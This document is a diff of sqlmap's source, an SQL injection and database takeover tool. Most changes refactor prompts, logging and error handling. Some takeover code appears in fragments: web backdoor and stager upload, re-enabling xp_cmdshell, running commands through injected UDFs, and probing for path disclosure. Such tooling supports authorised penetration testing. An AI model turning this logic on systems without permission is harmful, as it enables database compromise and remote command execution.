requestMsg = u"HTTP request [#%d]:\r\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))
requestMsg += getUnicode(("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url)
responseMsg = u"HTTP response "
requestHeaders = u""
responseHeaders = None
@@ -305,13 +312,13 @@ class Connect(object):
params = urlencode(params)
url = "%s?%s" % (url, params)
elif any((refreshing, crawling)):
elif any((refreshing, crawling, checking)):
pass
elif target:
if conf.forceSSL and urlparse.urlparse(url).scheme != "https":
url = re.sub("\Ahttp:", "https:", url, re.I)
url = re.sub(":80/", ":443/", url, re.I)
url = re.sub("(?i)\Ahttp:", "https:", url)
url = re.sub("(?i):80/", ":443/", url)
if PLACE.GET in conf.parameters and not get:
get = conf.parameters[PLACE.GET]
@@ -407,13 +414,13 @@ class Connect(object):
responseHeaders = _(ws.getheaders())
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
requestMsg += "\n%s" % requestHeaders
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
requestMsg += "\r\n%s" % requestHeaders
if post is not None:
requestMsg += "\n\n%s" % getUnicode(post)
requestMsg += "\r\n\r\n%s" % getUnicode(post)
requestMsg += "\n"
requestMsg += "\r\n"
threadData.lastRequestMsg = requestMsg
@@ -426,26 +433,26 @@ class Connect(object):
else:
req = urllib2.Request(url, post, headers)
requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
conf.cj._policy._now = conf.cj._now = int(time.time())
cookies = conf.cj._cookies_for_request(req)
requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
requestHeaders += "\r\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
if post is not None:
if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
requestHeaders += "\r\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
requestHeaders += "\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive")
requestHeaders += "\r\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive")
requestMsg += "\n%s" % requestHeaders
requestMsg += "\r\n%s" % requestHeaders
if post is not None:
requestMsg += "\n\n%s" % getUnicode(post)
requestMsg += "\r\n\r\n%s" % getUnicode(post)
requestMsg += "\n"
requestMsg += "\r\n"
if not multipart:
threadData.lastRequestMsg = requestMsg
@@ -509,9 +516,8 @@ class Connect(object):
msg += "(redirect like response common to login pages). "
msg += "Do you want to apply the refresh "
msg += "from now on (or stay on the original page)? [Y/n]"
choice = readInput(msg, default="Y")
kb.alwaysRefresh = choice not in ("n", "N")
kb.alwaysRefresh = readInput(msg, default='Y', boolean=True)
if kb.alwaysRefresh:
if re.search(r"\Ahttps?://", refresh, re.I):
@@ -544,6 +550,9 @@ class Connect(object):
page = None
responseHeaders = None
if checking:
return None, None, None
try:
page = ex.read() if not skipRead else None
responseHeaders = ex.info()
@@ -562,25 +571,25 @@ class Connect(object):
page = page if isinstance(page, unicode) else getUnicode(page)
code = ex.code
status = getUnicode(ex.msg)
kb.originalCode = kb.originalCode or code
threadData.lastHTTPError = (threadData.lastRequestUID, code)
threadData.lastHTTPError = (threadData.lastRequestUID, code, status)
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
status = getUnicode(ex.msg)
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]), start, time.time())
skipLogTraffic = True
if conf.verbose <= 5:
responseMsg += getUnicode(logHeaders)
elif conf.verbose > 5:
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
if not multipart:
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
@@ -596,7 +605,6 @@ class Connect(object):
else:
debugMsg = "page not found (%d)" % code
singleTimeLogMessage(debugMsg, logging.DEBUG)
processResponse(page, responseHeaders)
elif ex.code == httplib.GATEWAY_TIMEOUT:
if ignoreTimeout:
return None if not conf.ignoreTimeouts else "", None, None
@@ -615,10 +623,12 @@ class Connect(object):
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
logger.debug(debugMsg)
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError):
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError):
tbMsg = traceback.format_exc()
if "no host given" in tbMsg:
if checking:
return None, None, None
elif "no host given" in tbMsg:
warnMsg = "invalid URL address used (%s)" % repr(url)
raise SqlmapSyntaxException(warnMsg)
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
@@ -633,6 +643,7 @@ class Connect(object):
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests")
kb.droppingRequests = True
warnMsg = "connection timed out to the target URL"
elif "Connection reset" in tbMsg:
if not conf.disablePrecon:
@@ -641,6 +652,7 @@ class Connect(object):
if kb.testMode:
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests")
kb.droppingRequests = True
warnMsg = "connection reset to the target URL"
elif "URLError" in tbMsg or "error" in tbMsg:
warnMsg = "unable to connect to the target URL"
@@ -649,6 +661,8 @@ class Connect(object):
warnMsg += " ('%s')" % match.group(1).strip()
elif "NTLM" in tbMsg:
warnMsg = "there has been a problem with NTLM authentication"
elif "Invalid header name" in tbMsg: # (e.g. PostgreSQL ::Text payload)
return None, None, None
elif "BadStatusLine" in tbMsg:
warnMsg = "connection dropped or unknown HTTP "
warnMsg += "status code received"
@@ -668,6 +682,9 @@ class Connect(object):
if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)):
warnMsg += " or proxy"
if silent:
return None, None, None
with kb.locks.connError:
kb.connErrorCounter += 1
@@ -675,14 +692,13 @@ class Connect(object):
message = "there seems to be a continuous problem with connection to the target. "
message += "Are you sure that you want to continue "
message += "with further target testing? [y/N] "
kb.connErrorChoice = readInput(message, default="N") in ("Y", "y")
kb.connErrorChoice = readInput(message, default='N', boolean=True)
if kb.connErrorChoice is False:
raise SqlmapConnectionException(warnMsg)
if silent:
return None, None, None
elif "forcibly closed" in tbMsg:
if "forcibly closed" in tbMsg:
logger.critical(warnMsg)
return None, None, None
elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")):
@@ -709,7 +725,7 @@ class Connect(object):
page = getUnicode(page)
socket.setdefaulttimeout(conf.timeout)
processResponse(page, responseHeaders)
processResponse(page, responseHeaders, status)
if conn and getattr(conn, "redurl", None):
_ = urlparse.urlsplit(conn.redurl)
@@ -721,20 +737,20 @@ class Connect(object):
requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status)
else:
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
if not skipLogTraffic:
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]), start, time.time())
if conf.verbose <= 5:
responseMsg += getUnicode(logHeaders)
elif conf.verbose > 5:
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
if not multipart:
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
@@ -831,8 +847,7 @@ class Connect(object):
if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE:
if kb.cookieEncodeChoice is None:
msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282
choice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N')
kb.cookieEncodeChoice = choice.upper().strip() == "Y"
kb.cookieEncodeChoice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True)
if not kb.cookieEncodeChoice:
skip = True
@@ -884,7 +899,7 @@ class Connect(object):
post = value
if PLACE.CUSTOM_POST in conf.parameters:
post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value
post = conf.parameters[PLACE.CUSTOM_POST].replace(kb.customInjectionMark, "") if place != PLACE.CUSTOM_POST or not value else value
post = post.replace(ASTERISK_MARKER, '*') if post else post
if PLACE.COOKIE in conf.parameters:
@@ -1023,16 +1038,19 @@ class Connect(object):
try:
compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n')))
except SyntaxError, ex:
original = replacement = ex.text.strip()
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
if _ in keywords:
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
if ex.text:
original = replacement = ex.text.strip()
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
if _ in keywords:
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
break
if original == replacement:
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
break
if original == replacement:
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
break
else:
conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement)
else:
conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement)
break
else:
break
@@ -1051,39 +1069,39 @@ class Connect(object):
if name != "__builtins__" and originals.get(name, "") != value:
if isinstance(value, (basestring, int)):
found = False
value = getUnicode(value)
value = getUnicode(value, UNICODE_ENCODING)
if kb.postHint and re.search(r"\b%s\b" % re.escape(name), post or ""):
if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
if re.search(r"<%s\b" % re.escape(name), post):
found = True
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value, post)
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
elif re.search(r"\b%s>" % re.escape(name), post):
found = True
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value, post)
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
if not found and re.search(regex, (post or "")):
found = True
post = re.sub(regex, "\g<1>\g<2>%s" % value, post)
post = re.sub(regex, "\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
if not found and re.search(regex, (post or "")):
found = True
post = re.sub(regex, "\g<1>%s\g<3>" % value, post)
post = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
if re.search(regex, (get or "")):
found = True
get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
get = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
if re.search(regex, (query or "")):
found = True
uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value, uri)
uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
if re.search(regex, (cookie or "")):
found = True
cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie)
cookie = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
if not found:
if post is not None:
@@ -1212,7 +1230,7 @@ class Connect(object):
kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None
if content or response:
return page, headers
return page, headers, code
if getRatioValue:
return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)

20
lib/request/inject.py
View File

@@ -42,6 +42,7 @@ from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import GET_VALUE_UPPERCASE_KEYWORDS
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
from lib.core.settings import SQL_SCALAR_REGEX
from lib.core.threads import getCurrentThreadData
@@ -208,22 +209,22 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
message += "entries do you want to retrieve?\n"
message += "[a] All (default)\n[#] Specific number\n"
message += "[q] Quit"
test = readInput(message, default="a")
choice = readInput(message, default='A').upper()
if not test or test[0] in ("a", "A"):
if choice == 'A':
stopLimit = count
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
elif test.isdigit() and int(test) > 0 and int(test) <= count:
stopLimit = int(test)
elif choice.isdigit() and int(choice) > 0 and int(choice) <= count:
stopLimit = int(choice)
infoMsg = "sqlmap is now going to retrieve the "
infoMsg += "first %d query output entries" % stopLimit
logger.info(infoMsg)
elif test[0] in ("#", "s", "S"):
elif choice in ('#', 'S'):
message = "how many? "
stopLimit = readInput(message, default="10")
@@ -345,6 +346,9 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
kb.safeCharEncode = safeCharEncode
kb.resumeValues = resumeValue
for keyword in GET_VALUE_UPPERCASE_KEYWORDS:
expression = re.sub("(?i)(\A|\(|\)|\s)%s(\Z|\(|\)|\s)" % keyword, r"\g<1>%s\g<2>" % keyword, expression)
if suppressOutput is not None:
pushValue(getCurrentThreadData().disableStdOut)
getCurrentThreadData().disableStdOut = suppressOutput
@@ -356,7 +360,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
if expected == EXPECTED.BOOL:
forgeCaseExpression = booleanExpression = expression
if expression.upper().startswith("SELECT "):
if expression.startswith("SELECT "):
booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1")
else:
forgeCaseExpression = agent.forgeCaseStatement(expression)
@@ -414,7 +418,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
if found and conf.dnsDomain:
_ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items())))
_ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {'E': PAYLOAD.TECHNIQUE.ERROR, 'Q': PAYLOAD.TECHNIQUE.QUERY, 'U': PAYLOAD.TECHNIQUE.UNION}.items())))
warnMsg = "option '--dns-domain' will be ignored "
warnMsg += "as faster techniques are usable "
warnMsg += "(%s) " % _

18
lib/request/redirecthandler.py
View File

@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
"""
import re
import time
import types
import urllib2
import urlparse
@@ -50,18 +51,16 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
if kb.redirectChoice is None:
msg = "sqlmap got a %d redirect to " % redcode
msg += "'%s'. Do you want to follow? [Y/n] " % redurl
choice = readInput(msg, default="Y")
kb.redirectChoice = choice.upper()
kb.redirectChoice = REDIRECTION.YES if readInput(msg, default='Y', boolean=True) else REDIRECTION.NO
if kb.redirectChoice == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None:
msg = "redirect is a result of a "
msg += "POST request. Do you want to "
msg += "resend original POST data to a new "
msg += "location? [%s] " % ("Y/n" if not kb.originalPage else "y/N")
choice = readInput(msg, default=("Y" if not kb.originalPage else "N"))
kb.resendPostOnRedirect = choice.upper() == 'Y'
kb.resendPostOnRedirect = readInput(msg, default=('Y' if not kb.originalPage else 'N'), boolean=True)
if kb.resendPostOnRedirect:
self.redirect_request = self._redirect_request
@@ -71,6 +70,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
return urllib2.Request(newurl, data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host())
def http_error_302(self, req, fp, code, msg, headers):
start = time.time()
content = None
redurl = self._get_header_redirect(headers) if not conf.ignoreRedirects else None
@@ -94,18 +94,18 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
threadData.lastRedirectMsg = (threadData.lastRequestUID, content)
redirectMsg = "HTTP redirect "
redirectMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, getUnicode(msg))
redirectMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, getUnicode(msg))
if headers:
logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in headers.items())
logHeaders = "\r\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in headers.items())
else:
logHeaders = ""
redirectMsg += logHeaders
if content:
redirectMsg += "\n\n%s" % getUnicode(content[:MAX_CONNECTION_CHUNK_SIZE])
redirectMsg += "\r\n\r\n%s" % getUnicode(content[:MAX_CONNECTION_CHUNK_SIZE])
logHTTPTraffic(threadData.lastRequestMsg, redirectMsg)
logHTTPTraffic(threadData.lastRequestMsg, redirectMsg, start, time.time())
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg)
if redurl:
@@ -129,7 +129,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
if HTTP_HEADER.COOKIE not in req.headers:
req.headers[HTTP_HEADER.COOKIE] = _
else:
req.headers[HTTP_HEADER.COOKIE] = re.sub("%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (_.split('=')[0], delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter))
req.headers[HTTP_HEADER.COOKIE] = re.sub("%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (re.escape(_.split('=')[0]), delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter))
try:
result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
except urllib2.HTTPError, e:

2
lib/request/templates.py
View File

@@ -13,7 +13,7 @@ def getPageTemplate(payload, place):
if payload and place:
if (payload, place) not in kb.pageTemplates:
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)
retVal = kb.pageTemplates[(payload, place)]

11
lib/takeover/abstraction.py
View File

@@ -75,17 +75,17 @@ class Abstraction(Web, UDF, XP_cmdshell):
return safechardecode(retVal)
def runCmd(self, cmd):
getOutput = None
choice = None
if not self.alwaysRetrieveCmdOutput:
message = "do you want to retrieve the command standard "
message += "output? [Y/n/a] "
getOutput = readInput(message, default="Y")
choice = readInput(message, default='Y').upper()
if getOutput in ("a", "A"):
if choice == 'A':
self.alwaysRetrieveCmdOutput = True
if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput:
if choice == 'Y' or self.alwaysRetrieveCmdOutput:
output = self.evalCmd(cmd)
if output:
@@ -166,9 +166,8 @@ class Abstraction(Web, UDF, XP_cmdshell):
msg += "statements as another DBMS user since you provided the "
msg += "option '--dbms-creds'. If you are DBA, you can enable it. "
msg += "Do you want to enable it? [Y/n] "
choice = readInput(msg, default="Y")
if not choice or choice in ("y", "Y"):
if readInput(msg, default='Y', boolean=True):
expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1")
inject.goStacked(expression)

47
lib/takeover/udf.py
View File

@@ -42,12 +42,8 @@ class UDF:
def _askOverwriteUdf(self, udf):
message = "UDF '%s' already exists, do you " % udf
message += "want to overwrite it? [y/N] "
output = readInput(message, default="N")
if output and output[0] in ("y", "Y"):
return True
else:
return False
return readInput(message, default='N', boolean=True)
def _checkExistUdf(self, udf):
logger.info("checking if UDF '%s' already exist" % udf)
@@ -158,9 +154,8 @@ class UDF:
message = "do you want to proceed anyway? Beware that the "
message += "operating system takeover will fail [y/N] "
choice = readInput(message, default="N")
if choice and choice.lower() == "y":
if readInput(message, default='N', boolean=True):
written = True
else:
return False
@@ -241,9 +236,9 @@ class UDF:
msg += "from the shared library? "
while True:
udfCount = readInput(msg, default=1)
udfCount = readInput(msg, default='1')
if isinstance(udfCount, basestring) and udfCount.isdigit():
if udfCount.isdigit():
udfCount = int(udfCount)
if udfCount <= 0:
@@ -251,10 +246,6 @@ class UDF:
return
else:
break
elif isinstance(udfCount, int):
break
else:
logger.warn("invalid value, only digits are allowed")
@@ -276,20 +267,16 @@ class UDF:
self.udfs[udfName]["input"] = []
default = 1
msg = "how many input parameters takes UDF "
msg += "'%s'? (default: %d) " % (udfName, default)
msg += "'%s'? (default: 1) " % udfName
while True:
parCount = readInput(msg, default=default)
parCount = readInput(msg, default='1')
if isinstance(parCount, basestring) and parCount.isdigit() and int(parCount) >= 0:
if parCount.isdigit() and int(parCount) >= 0:
parCount = int(parCount)
break
elif isinstance(parCount, int):
break
else:
logger.warn("invalid value, only digits >= 0 are allowed")
@@ -298,9 +285,9 @@ class UDF:
msg += "number %d? (default: %s) " % ((y + 1), defaultType)
while True:
parType = readInput(msg, default=defaultType)
parType = readInput(msg, default=defaultType).strip()
if isinstance(parType, basestring) and parType.isdigit():
if parType.isdigit():
logger.warn("you need to specify the data-type of the parameter")
else:
@@ -327,12 +314,12 @@ class UDF:
msg = "do you want to call your injected user-defined "
msg += "functions now? [Y/n/q] "
choice = readInput(msg, default="Y")
choice = readInput(msg, default='Y').upper()
if choice[0] in ("n", "N"):
if choice == 'N':
self.cleanup(udfDict=self.udfs)
return
elif choice[0] in ("q", "Q"):
elif choice == 'Q':
self.cleanup(udfDict=self.udfs)
raise SqlmapUserQuitException
@@ -347,9 +334,9 @@ class UDF:
msg += "\n[q] Quit"
while True:
choice = readInput(msg)
choice = readInput(msg).upper()
if choice and choice[0] in ("q", "Q"):
if choice == 'Q':
break
elif isinstance(choice, basestring) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList):
choice = int(choice)
@@ -390,9 +377,8 @@ class UDF:
cmd = cmd[:-1]
msg = "do you want to retrieve the return value of the "
msg += "UDF? [Y/n] "
choice = readInput(msg, default="Y")
if choice[0] in ("y", "Y"):
if readInput(msg, default='Y', boolean=True):
output = self.udfEvalCmd(cmd, udfName=udfToCall)
if output:
@@ -403,9 +389,8 @@ class UDF:
self.udfExecCmd(cmd, udfName=udfToCall, silent=True)
msg = "do you want to call this or another injected UDF? [Y/n] "
choice = readInput(msg, default="Y")
if choice[0] not in ("y", "Y"):
if not readInput(msg, default='Y', boolean=True):
break
self.cleanup(udfDict=self.udfs)

18
lib/takeover/web.py
View File

@@ -202,13 +202,12 @@ class Web:
if not kb.absFilePaths:
message = "do you want sqlmap to further try to "
message += "provoke the full path disclosure? [Y/n] "
getOutput = readInput(message, default="Y")
if getOutput in ("y", "Y"):
if readInput(message, default='Y', boolean=True):
headers = {}
been = {conf.url}
been = set([conf.url])
for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage, re.I):
for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I):
url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
if url not in been:
try:
@@ -233,7 +232,7 @@ class Web:
if place in conf.parameters:
value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
if "[]" in value:
page, headers = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)
cookie = None
@@ -245,12 +244,12 @@ class Web:
if cookie:
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
if value != cookie:
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
if value != cookie:
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)
directories = list(arrayizeValue(getManualDirectories()))
@@ -371,7 +370,7 @@ class Web:
_ = "tmpe%s.exe" % randomStr(lowercase=True)
if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'))
self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_"))
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = backdoorDirectory
else:
@@ -391,9 +390,8 @@ class Web:
message = "do you want to try the same method used "
message += "for the file stager? [Y/n] "
getOutput = readInput(message, default="Y")
if getOutput in ("y", "Y"):
if readInput(message, default='Y', boolean=True):
self._webFileInject(backdoorContent, backdoorName, directory)
else:
continue

3
lib/takeover/xp_cmdshell.py
View File

@@ -255,9 +255,8 @@ class XP_cmdshell:
message = "xp_cmdshell extended procedure does not seem to "
message += "be available. Do you want sqlmap to try to "
message += "re-enable it? [Y/n] "
choice = readInput(message, default="Y")
if not choice or choice in ("y", "Y"):
if readInput(message, default='Y', boolean=True):
self._xpCmdshellConfigure(1)
if self._xpCmdshellCheck():

21
lib/techniques/blind/inference.py
View File

@@ -97,7 +97,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# Set kb.partRun in case "common prediction" feature (a.k.a. "good samaritan") is used or the engine is called from the API
if conf.predictOutput:
kb.partRun = getPartRun()
elif hasattr(conf, "api"):
elif conf.api:
kb.partRun = getPartRun(alias=False)
else:
kb.partRun = None
@@ -168,7 +168,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
